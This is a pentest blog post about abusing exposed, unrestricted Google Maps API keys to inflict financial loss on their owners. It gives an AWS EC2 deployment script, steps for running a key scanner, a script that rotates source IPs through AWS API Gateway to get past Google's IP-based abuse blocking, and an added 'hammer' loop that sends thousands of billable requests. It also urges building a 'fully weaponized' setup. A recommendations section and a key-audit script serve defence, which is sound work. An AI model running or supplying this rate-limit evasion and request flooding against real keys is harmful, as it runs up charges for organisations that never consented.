A Pentester Story - How to Increase the Impact of an Underrated Issue

Too many organizations put their financial stability at risk by not enforcing proper security boundaries around their Google Maps API key. If you are in charge of an application that consumes this service, make sure the key is configured properly and that appropriate controls are in place to prevent external abuse.

Security Hubs Team - March 24, 2022
  • API / Misconfiguration
  • Google Maps
NARRATIVE

Google Maps Platform is a paid service that lets applications embed maps and query the Google Maps database. To consume these services an organization needs an API key, which identifies the billing account every request is charged to.

For example, the standard price of the Static Maps service is $2 per 1,000 requests. Other services cost more, as the following example taken from the official Google pricing page shows.

(Figure: Google Maps Platform usage pricing, taken from the official website)

Because the key is shipped to the browser inside the page that embeds the map, it is public and easily discoverable by any Internet user. Google does offer security settings for it (application restrictions and API restrictions), but a freshly created key is unrestricted by default. As with any other cloud service, it is up to the organization's technical team to know these defaults and tighten them to the organization's actual needs.

Unfortunately, that is not what happens in most cases. Although this issue does not affect the confidentiality or integrity of customer data, Google Maps API keys are routinely found overly permissive and lacking the security boundaries that would prevent financial damage.

THE VULNERABILITY

The original research is straightforward and belongs to Ozgur Alp, a Turkish security researcher who first published it together with an open-source scanner. However, almost two years after its details were first released, we consider this finding still considerably underrated.

ADDED VALUE

To add more value to the final pentest results, we developed an add-on concept that can be bootstrapped into the detection and attack flow. Rather than stopping at a simple confirmation that the key is "vulnerable" or not, we wanted to hand the client a PoC they can deploy themselves and use to understand the impact of this issue for their own business model.

ATTACK SCENARIO

The economics of this attack come down to one ability: someone other than the owner sending millions of requests with the key without being blocked by the Google API service.

Our original idea was to design a reusable PoC scenario that every client affected by this issue could run and understand. Because of the financial nature of the issue, we consider that the PoC should be executed by the organization's own team(s), against their own key.

It is worth mentioning that the Google API backend does detect and block short bursts of abuse of a key. In our observation, however, that whole defense keys on the source IP address, which means that a large pool of source addresses bypasses this first line of defense.

This is where AWS comes in handy: every request forwarded through an API Gateway endpoint leaves from a different address in the AWS pool, so the target sees a different source IP per request.

So we decided to use two basic AWS features: an EC2 instance sending its traffic through AWS API Gateway. The concept of using AWS API Gateway to evade IP-based restrictions is not new, and it is well documented by others (check the References section).

And last but not least before jumping into the technical side of things, here’s the “complex” high-level design architecture of this idea.

(Figure: attack concept high-level design)

BUILDING UP THE CONCEPT

Nowadays, each of the big three cloud providers lets you use Infrastructure as Code to deploy and reuse a custom architecture. Although many would say "Terraform", we took a slightly more exotic path and used Pulumi. Some people do not like the HashiCorp configuration language but are happy with plain Python, and that is where this option comes in handy.

Prerequisites

1. Install Pulumi: https://www.pulumi.com/docs/get-started/install/

2. Configure AWS credentials: https://www.pulumi.com/docs/intro/cloud-providers/aws/setup/

3. Create a project with:

---------------------------------------------------------------------------
pulumi new aws-python --name <project-name>
---------------------------------------------------------------------------

(you may be asked to log in to Pulumi first)

4. Open __main__.py and replace its contents with the script below.

The (Pulumi) Script

---------------------------------------------------------------------------
import pulumi
import pulumi_aws as aws

size = 't2.micro'

# AMI prepared beforehand with the scanner and its Python dependencies
# (built and named "gmaps-api-demo" in your own AWS account)
ami = aws.get_ami(most_recent=True,
    owners=["your_aws_account_12_digits_number"],
    filters=[{"name": "name", "values": ["gmaps-api-demo"]}])

# SSH only from your own address. The explicit egress rule is required:
# the provider creates the group without the console's default allow-all
# egress, and the instance must reach Google and the API Gateway endpoints.
group = aws.ec2.SecurityGroup('maps-secgrp', description='Enable SSH access',
    ingress=[
        {'protocol': 'tcp', 'from_port': 22, 'to_port': 22, 'cidr_blocks': ['your_external_ip/32']}
    ],
    egress=[
        {'protocol': '-1', 'from_port': 0, 'to_port': 0, 'cidr_blocks': ['0.0.0.0/0']}
    ])

server = aws.ec2.Instance('Google-API-Cannon', instance_type=size,
    vpc_security_group_ids=[group.id],   # reference the security group from above
    key_name='your_ec2_keypair_name',    # existing EC2 key pair, needed for the SSH step below
    ami=ami.id)

pulumi.export('publicIp', server.public_ip)
pulumi.export('publicHostName', server.public_dns)
---------------------------------------------------------------------------


5. Run pulumi up to preview and apply the infrastructure; check the AWS account to see the instance.

When you are done with the exercise:

5.1. Run pulumi destroy to clean up your resources.

5.2. Run pulumi stack rm to delete your stack.

6. SSH into the fresh EC2 instance and run the following commands:

6.1. - git clone the Google Maps API Scanner (link in the References section)

6.2. - python3 -m pip install requests

6.3. - python3 -m pip install requests-ip-rotator

6.4. - aws configure, using an access key whose IAM permissions allow creating and deleting API Gateway REST APIs (requests-ip-rotator creates one endpoint per region and removes them on shutdown)

6.5. - check whether the Google Maps API key is vulnerable:

---------------------------------------------------------------------------
python3 maps_api_scanner_python3.py
---------------------------------------------------------------------------


6.5.1. If the API key is reported vulnerable, copy the direct attack vector link the scanner prints for the affected service. In this case the vector is a single GET request to the Google Maps backend, carrying the key as a query parameter.

6.5.2. For a straightforward PoC, reuse the official example script from the requests-ip-rotator library author, pointed at that URL.

The following script uses AWS API Gateway to send GET requests to the target from rotating source addresses.

---------------------------------------------------------------------------
import requests
from requests_ip_rotator import ApiGateway

# Scheme and host of the affected service (for Google Maps: https://maps.googleapis.com);
# the full GET URL, key included, is the link the scanner reported in step 6.5.1
site = "target_affected_service_url"
attack_url = "target_affected_service_url"

# The context manager creates the API Gateway endpoints on entry and
# deletes them on exit, so nothing is left running (and billing) in AWS
with ApiGateway(site) as g:
    session = requests.Session()
    session.mount(site, g)   # every request to `site` now leaves from a different AWS IP

    response = session.get(attack_url)
    # 200 means Google accepted (and billed) the request; log it for the PoC report
    print(response.status_code)
---------------------------------------------------------------------------
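The following script is an added illustration of steps 6.5 to 6.5.2 above; it is neither the authors' automated setup nor the open-source scanner's code. It checks a key the way the scanner does (one probe per service, classifying Google's answer as accepted or denied), and it meters a request loop so the client running the PoC against their own key can read the expected bill off the result. Assumptions: the probe URLs follow Google's documented Static Maps and Geocoding endpoints, the `ApiGateway` class is used as the page's snippet uses it, the price is the $2 per 1,000 Static Maps requests quoted in the narrative, and the responses used for the offline run are constructed, not captured traffic.

```python
"""Check whether a Google Maps API key is unrestricted, then drive a
metered request loop against the GET URL the scanner reports.

Added example, not the page's tooling. Endpoint URLs follow Google's
public docs; offline responses below are constructed; price is the
$2 per 1,000 Static Maps requests quoted in the narrative.
"""
import json
import urllib.error
import urllib.request
from collections import Counter
from typing import Callable, Dict, Tuple

# A fetcher returns (http_status, content_type, body) for a URL.
Fetcher = Callable[[str], Tuple[int, str, bytes]]

MAPS_HOST = "https://maps.googleapis.com"
PROBES = {
    "staticmap": MAPS_HOST + "/maps/api/staticmap?center=45.0,10.0&zoom=7&size=400x400&key={key}",
    "geocode": MAPS_HOST + "/maps/api/geocode/json?latlng=40.714224,-73.961452&key={key}",
}
STATICMAP_PRICE_PER_1000 = 2.00  # USD, from the pricing figure above


def urllib_fetch(url: str) -> Tuple[int, str, bytes]:
    """Stdlib fetcher that hands back 4xx/5xx responses instead of raising."""
    try:
        with urllib.request.urlopen(url, timeout=15) as resp:
            return resp.status, resp.headers.get("Content-Type", ""), resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Content-Type", ""), err.read()


def classify(service: str, status: int, ctype: str, body: bytes) -> str:
    """Turn one probe response into 'vulnerable', 'restricted' or 'unknown'.
    Static Maps answers an accepted key with an image and a rejected one with
    HTTP 403; JSON services put the verdict in their "status" field, which is
    REQUEST_DENIED when the key's application or API restrictions reject us."""
    if service == "staticmap":
        if status == 200 and ctype.startswith("image/"):
            return "vulnerable"
        return "restricted" if status == 403 else "unknown"
    try:
        payload = json.loads(body.decode("utf-8", "replace"))
    except ValueError:
        return "unknown"
    api_status = payload.get("status", "")
    if api_status in ("OK", "ZERO_RESULTS"):
        return "vulnerable"
    if api_status == "REQUEST_DENIED":
        return "restricted"
    return "unknown"  # OVER_QUERY_LIMIT, INVALID_REQUEST, ...


def check_key(key: str, fetch: Fetcher = urllib_fetch) -> Dict[str, str]:
    """Probe every service in PROBES with the key; one verdict per service."""
    return {svc: classify(svc, *fetch(url.format(key=key))) for svc, url in PROBES.items()}


def hammer(url: str, count: int, fetch: Fetcher,
           price_per_1000: float = STATICMAP_PRICE_PER_1000) -> Dict[str, object]:
    """Send `count` GETs, tally status codes and estimate the bill for the
    accepted (HTTP 200, hence billable) requests."""
    codes = Counter(fetch(url)[0] for _ in range(count))
    billable = codes.get(200, 0)
    return {"codes": dict(codes), "billable": billable,
            "estimated_cost_usd": round(billable * price_per_1000 / 1000, 2)}


def rotating_fetch(site: str = MAPS_HOST):
    """Fetcher whose requests egress through AWS API Gateway, as in the PoC.
    Needs requests, requests-ip-rotator and AWS credentials (imported lazily);
    call the returned shutdown() afterwards to delete the gateways."""
    import requests
    from requests_ip_rotator import ApiGateway
    gateway = ApiGateway(site)
    gateway.start()
    session = requests.Session()
    session.mount(site, gateway)

    def fetch(url: str) -> Tuple[int, str, bytes]:
        r = session.get(url, timeout=15)
        return r.status_code, r.headers.get("Content-Type", ""), r.content
    return fetch, gateway.shutdown


def fake_fetch_for(verdict: str) -> Fetcher:
    """Constructed responses imitating Google's answers; no traffic is sent."""
    def fetch(url: str) -> Tuple[int, str, bytes]:
        if "/staticmap" in url:
            if verdict == "vulnerable":
                return 200, "image/png", b"\x89PNG\r\n\x1a\n"
            return 403, "text/html; charset=UTF-8", b"The Google Maps Platform server rejected your request."
        status = "OK" if verdict == "vulnerable" else "REQUEST_DENIED"
        return 200, "application/json; charset=UTF-8", json.dumps({"status": status, "results": []}).encode()
    return fetch


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                      # real check of one key, no hammering
        print(check_key(sys.argv[1]))
    else:                                      # offline demonstration
        fetch = fake_fetch_for("vulnerable")
        print(check_key("AIza-demo-key", fetch))
        print(hammer(PROBES["staticmap"].format(key="AIza-demo-key"), 1500, fetch))
```

Run it with a key as the only argument for a real, single-shot check; without arguments it exercises the same logic against the constructed responses. To turn it into the rotating PoC, swap `fetch, shutdown = rotating_fetch()` in for `urllib_fetch`, pass the scanner's URL to `hammer`, and call `shutdown()` at the end; the `estimated_cost_usd` field is what the client should compare with the invoice it eventually receives.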


Note: We will not share our full automated setup, for obvious reasons. For a fully weaponized, automated PoC you have to invest some time and effort, connect the dots and build a setup that scales to your needs.

IMPACT

An organization's Google Maps API key can be hijacked and used by someone else, or abused to inflict a (bounded) financial loss.

From what we have been told, Google's current billing behaviour is to issue invoices that sum up the total fee for all consumed services (for example reCAPTCHA Enterprise alongside Maps) without a per-service cost breakdown. This means anomalies cannot be easily spotted by the procurement department.

RECOMMENDATIONS

- Restrict the API key to the features agreed with the business side: in the Google Cloud Console set an application restriction (HTTP referrers for keys embedded in web pages, IP addresses for server-side keys, app identifiers for mobile apps) and an API restriction that limits the key to the Maps services actually used. Then cap the blast radius with per-API quotas and a billing budget alert, since a restriction limits who may call the key, not how many calls get billed.

- Consider contacting Google Support which, although it has acknowledged the issue, has yet to provide clear guidance on how to protect against API key abuse scenarios.

- Record this issue in the organization's internal risk assessment registry.
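The following script is an added example of the first recommendation turned into a check; it is not the authors' code. It reads the API key resources of a Google Cloud project as the API Keys API v2 returns them (the JSON that `gcloud services api-keys list --format=json` prints; availability of that command in your gcloud version is an assumption) and reports every key that has no application restriction, a wildcard referrer, or no API restriction. The three sample keys at the bottom are constructed, not real.

```python
"""Audit a Google Cloud project's API keys for the unrestricted-key condition.

Added example, not the page's code. Input is a list of API Keys API v2 Key
resources (restrictions.browserKeyRestrictions, serverKeyRestrictions,
androidKeyRestrictions, iosKeyRestrictions, apiTargets). SAMPLE_KEYS is
constructed data for the offline run.
"""
import json
import sys
from typing import Dict, List

APP_RESTRICTIONS = ("browserKeyRestrictions", "serverKeyRestrictions",
                    "androidKeyRestrictions", "iosKeyRestrictions")

MESSAGES = {
    "NO_APP_RESTRICTION": "no application restriction: any referrer, IP or app may use the key",
    "WILDCARD_REFERRER": "browser restriction allows '*', which matches every site",
    "NO_API_RESTRICTION": "no API restriction: accepted by every API enabled in the project",
}


def audit_key(key: Dict) -> List[str]:
    """Return the finding codes for one key (empty list = properly scoped)."""
    findings = []
    restrictions = key.get("restrictions") or {}
    if not any(kind in restrictions for kind in APP_RESTRICTIONS):
        findings.append("NO_APP_RESTRICTION")
    referrers = (restrictions.get("browserKeyRestrictions") or {}).get("allowedReferrers") or []
    if "*" in referrers:
        findings.append("WILDCARD_REFERRER")
    if not restrictions.get("apiTargets"):
        findings.append("NO_API_RESTRICTION")
    return findings


def audit_project(keys: List[Dict]) -> Dict[str, List[str]]:
    """Map each offending key's display name (or uid) to its findings."""
    report = {}
    for key in keys:
        findings = audit_key(key)
        if findings:
            report[key.get("displayName") or key.get("uid", "?")] = findings
    return report


# Constructed sample: three keys as they might appear in one project.
SAMPLE_KEYS = [
    # the default key Google creates when Maps is enabled: no restriction at all
    {"displayName": "Browser key (auto created by Google Service)", "uid": "k1"},
    # someone "restricted" it, but '*' lets every referrer through
    {"displayName": "website-maps", "uid": "k2",
     "restrictions": {"browserKeyRestrictions": {"allowedReferrers": ["*"]}}},
    # scoped to the company site and to the Static Maps backend only
    {"displayName": "website-maps-scoped", "uid": "k3",
     "restrictions": {
         "browserKeyRestrictions": {"allowedReferrers": ["https://www.example.com/*"]},
         "apiTargets": [{"service": "static-maps-backend.googleapis.com"}]}},
]

if __name__ == "__main__":
    # pipe real data in, e.g.: gcloud services api-keys list --format=json | python3 audit_keys.py
    keys = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE_KEYS
    for name, codes in audit_project(keys).items():
        for code in codes:
            print(f"{name}: {MESSAGES[code]}")
```

Keys that pass this audit are still billable up to their quota, so pair the check with the per-API quota and budget alert mentioned above.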

ACKNOWLEDGEMENTS | REFERENCES | RESOURCES


- https://cloud.google.com/maps-platform/pricing
- https://developers.google.com/maps/billing/gmp-billing
- https://phoenixnap.com/blog/what-is-pulumi
- https://ozguralp.medium.com/unauthorized-google-maps-api-key-usage-cases-and-why-you-need-to-care-1ccb28bf21e
- https://github.com/ozguralp/gmapsapiscanner/
- https://aws.amazon.com/api-gateway/faqs/
- https://docs.aws.amazon.com/lambda/latest/dg/services-apigateway.html
- https://bigb0ss.medium.com/rotating-source-ips-part-1-aws-api-gateway-fe29d2c5e008
- https://bigb0sss.github.io/posts/redteam-rotate-ip-aws-gateway/
- https://github.com/Ge0rg3/requests-ip-rotator


LEGAL STATEMENT

The information in this blog post is provided for research and educational purposes only. Whilst every effort has been made to ensure that the information contained in this document is true and correct at the time of publication, Security Hubs, Inc. accepts no liability in any form whatsoever for any direct or indirect damages arising or resulting from the use of or reliance on the information contained herein.
